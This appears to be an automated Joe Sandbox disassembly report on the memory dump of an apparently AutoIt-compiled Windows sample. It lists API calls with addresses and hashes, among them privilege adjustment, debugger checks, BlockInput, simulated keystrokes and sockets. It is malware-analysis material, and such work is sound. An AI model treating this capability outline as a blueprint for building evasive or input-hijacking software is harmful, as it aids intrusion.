                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A71922
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A71931
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A71938
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7194E
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00A71C81), ref: 00A720FB
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A72107
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00A7210E
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A72127
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00A71C81), ref: 00A7213B
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A72142
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A8A5BD
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A8A6D0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A842B9: GetInputState.USER32 ref: 00A84310
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A842B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A843AB
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A8A5ED
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A8A6BA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,?), ref: 00A1233E
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00A12421
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00A12434
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A93AD7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93AAB: _wcslen.LIBCMT ref: 00A93AF8
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A922BA
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A922E1
                                                                                                                                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00A92338
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A92343
                                                                                                                                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00A92372
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00A8D8CE
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00A8D92F
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00A8D943
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00A546AC), ref: 00A7E482
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00A7E491
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00A7E4A2
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A7E4AE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                                                                                                                                    • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                    • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                    • Opcode ID: 466e49ffd7b2f0567c26425be89e3973c9d02cf4f3afb1ef024d5c684b9012d1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6eb26acd545a9dd02e8a5c3e7441360825c6f494acd333f91be46ee1c1159361
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 466e49ffd7b2f0567c26425be89e3973c9d02cf4f3afb1ef024d5c684b9012d1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72D062BDC05119EACB91D694DD49DF9737CBB19700F648866F946D1040F72499489B22
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00A42A8A
                                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00A42A94
                                                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00A42AA1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0559581e0314cdd4abbf44bba1ab19813974a06cdbae60895745d89bfb06b620
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9c017fc3b78c32499ffd294d00e6f37c1a09c5908784284002d9c6ecc0d960a1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0559581e0314cdd4abbf44bba1ab19813974a06cdbae60895745d89bfb06b620
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB31B5759012289BCB21DF68DD89BDDBBB8AF48350F5041EAF80CA6261E7709F85CF45
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A309D8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A309F5
                                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A7205A
                                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A72087
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A72097
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 40269e758e3f239cf42468f6b266b8fd0ee9905605192596b5acd74a22eb6927
                                                                                                                                                                                                                                                                                                    • Instruction ID: 538cbf7b098706c1257c16089b61a8bf65a023dcc9912bb68cf68051ffeb75b9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40269e758e3f239cf42468f6b266b8fd0ee9905605192596b5acd74a22eb6927
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38118FB1414205AFD7189F64DC86E6BB7B8EB45710F20C51EF05A57691DB70BC42CB64
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00A3502E,?,00AD98D8,0000000C,00A35185,?,00000002,00000000), ref: 00A35079
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00A3502E,?,00AD98D8,0000000C,00A35185,?,00000002,00000000), ref: 00A35080
                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00A35092
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5cc46cdb9ec225083415826b48040e3a1e87ba5ee2abd84c81078e42b07b1feb
                                                                                                                                                                                                                                                                                                    • Instruction ID: a4645032b73cc127bd0bcd519d0fa1309a6c17e82b0773cd17f5268f2c65b468
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cc46cdb9ec225083415826b48040e3a1e87ba5ee2abd84c81078e42b07b1feb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BE0EC32400648EFCF25AFA8DE09E583B69EF52381F114414F88A9A972DB36DD43CBD0
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00A6E664
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A952EE,?,?,00000035,?), ref: 00A84229
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A952EE,?,?,00000035,?), ref: 00A84239
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A7BC24
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00A7BC37
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A71B48), ref: 00A71A20
• CloseHandle.KERNEL32(?,?,00A71B48), ref: 00A71A35
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• BlockInput.USER32(00000001), ref: 00A8F51A
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7970bda0f50c164382ec4c82857d51d9fd840810ebe880862e645a7ad4b8697b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 18a16c59dafd5af6369b6db27d94b399fda4f0d0f65c2445904a6314c2854421
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7970bda0f50c164382ec4c82857d51d9fd840810ebe880862e645a7ad4b8697b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAE04F322102159FCB10EF69D804A9AF7E8AFA4761F048426FC8AC7351DB70F9818BA1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A7ECC7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: db94bcce7102f295ca0d43f9e3c9647e590ee3fecca63b2240f470b7bb833f79
                                                                                                                                                                                                                                                                                                    • Instruction ID: f8ad56beb8492801e85c155518382f54ef903611afe2f908ac52a439a3452a0f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db94bcce7102f295ca0d43f9e3c9647e590ee3fecca63b2240f470b7bb833f79
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CD05BBE15410138E41FC73D4E1FB761509E709741F44C6C9B20AC56D8E5D19D009061
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00A3075E), ref: 00A30D4A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 118e59df1a42ae2a7a7f2df6f2d3fdaf861808b0f8e62235eab67a0204fc73b8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0dcb3cd86873369624edf1418ec6cc3ee3757c72450807f2d64e4648cc179595
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118e59df1a42ae2a7a7f2df6f2d3fdaf861808b0f8e62235eab67a0204fc73b8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00A9358D
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00A935A0
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00A935AF
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A935CA
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00A935D1
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A93700
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A9370E
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A93755
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00A93761
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A9379D
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A937BF
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A937D2
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A937DD
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00A937E6
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A937F5
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00A937FE
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A93805
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00A93810
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A93822
                                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AB0C04,00000000), ref: 00A93838
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00A93848
                                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A9386E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A9388D
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A938AF
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A93A9C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                    • Opcode ID: b7c3d30bc5d3c1164c344cd6f1fb6c2b04f115ee3c2c6095349adbcb327d62cd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5213b6a9ceb1b83b9d403a21aa5d877727ac6265dbf74a3c318bb7f67336092f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7c3d30bc5d3c1164c344cd6f1fb6c2b04f115ee3c2c6095349adbcb327d62cd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1026F72600215AFDF14DFA4CD89EAE7BB9FB49310F048158F9569B2A0DB74AD41CF60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00AA7B67
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00AA7B98
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00AA7BA4
